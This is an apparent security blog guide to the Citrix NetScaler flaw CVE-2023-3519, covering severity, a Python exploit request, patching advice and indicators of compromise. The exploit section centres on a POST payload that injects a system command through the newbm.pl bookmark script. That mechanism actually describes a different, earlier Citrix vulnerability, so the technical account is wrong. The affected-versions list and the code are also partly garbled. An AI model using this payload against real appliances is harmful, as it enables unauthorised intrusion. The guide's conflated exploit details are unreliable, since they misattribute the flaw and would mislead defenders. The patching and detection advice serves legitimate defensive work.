CVE-2023-3519 - Complete Guide to the Unauthenticated Remote Code Execution (RCE) in Citrix NetScaler ADC and Gateway

In July 2023, a serious security vulnerability—CVE-2023-3519—was discovered affecting Citrix NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway). This bug allows attackers to run their own code on vulnerable appliances, with no login required! Let’s break down what happened, how it works, and what you need to do to stay safe.

Type: Unauthenticated Remote Code Execution (RCE)

- Products affected: Citrix NetScaler ADC and NetScaler Gateway (formerly Citrix ADC/Gateway)

Severity: Critical

(CVSS 9.8/10)

Exploited in the wild: Yes (even before patches released!)

In simple terms:  
A remote attacker can gain full control over the appliance, just by sending a crafted HTTP request, without a username or password.

ADC 12.1-NDcPP before 12.1-55.300

If your appliance has public internet access and is not patched, you are at high risk!

How Does the Exploit Work?

Attackers found a way to abuse how the Citrix Gateway handles web requests. By sending a specially crafted HTTP POST request, the attacker tricks the device into running malicious code.

Exploit Details & Code Example

> Warning: For educational purposes only! Do not use on systems you don't have permission to test.

The exploit abuses an endpoint called /vpn/../vpns/portal/scripts/newbm.pl. The attack uses a bm (bookmark) parameter containing malicious Perl code.

Example exploit POST request

import requests

url = "https://YOUR-TARGET/vpn/../vpns/portal/scripts/newbm.pl";
payload = {
    "url": "http://test";,
    "title": "test",
    "desc": "desc",
    "UI_inuse": "RfWeb",
    "isset": "set",
    "shared": "false",
    # The 'bm' parameter contains the injected code 
    "bm": "test';system('id');'"
}

response = requests.post(url, data=payload, verify=False)
print(response.text)

What happens:
This payload will run the id command on the appliance, showing info about the user (which helps confirm code execution).

No password required: Anyone can attack; if your gateway is public-facing, you are a target.

- Full device compromise: Attackers can download data, install malware, or use your box as a launchpad for more attacks.
- Active exploitations: Multiple groups, including ransomware gangs and APTs, quickly weaponized this bug.

References & Further Reading

- Official Citrix Security Bulletin
- CISA Advisory
- Rapid7 Analysis and Exploit Details
- Mandiant Threat Report

1. Upgrade Immediately!

- Install the latest patches for your Citrix appliances.

2. Check If You’re Compromised

- Look for strange files or unknown command execution in /var/tmp/, /netscaler/portal/scripts/, and logs.

3. Restrict Internet Access

- Only expose your gateway to the minimum necessary. Use access lists/firewalls to allow only trusted IPs.

Indicators of Compromise (IoC)

- Unusual files in /netscaler/portal/scripts/

Conclusion

CVE-2023-3519 is one of the most severe vulnerabilities to hit public-facing appliances in recent years. If you use Citrix gateways, patch now, check your devices, and monitor for abuse. Don’t wait—attackers are actively hunting for vulnerable systems.

Stay Secure—Patch Early, Patch Often!

Want to know more or need help checking your systems?  
Contact your Citrix representative or consult the official advisory above.


> _This guide is exclusive and simplified for clearer understanding. Please spread awareness—your security depends on it!_

Timeline

Published on: 07/19/2023 18:15:11 UTC
Last modified on: 08/04/2023 18:15:17 UTC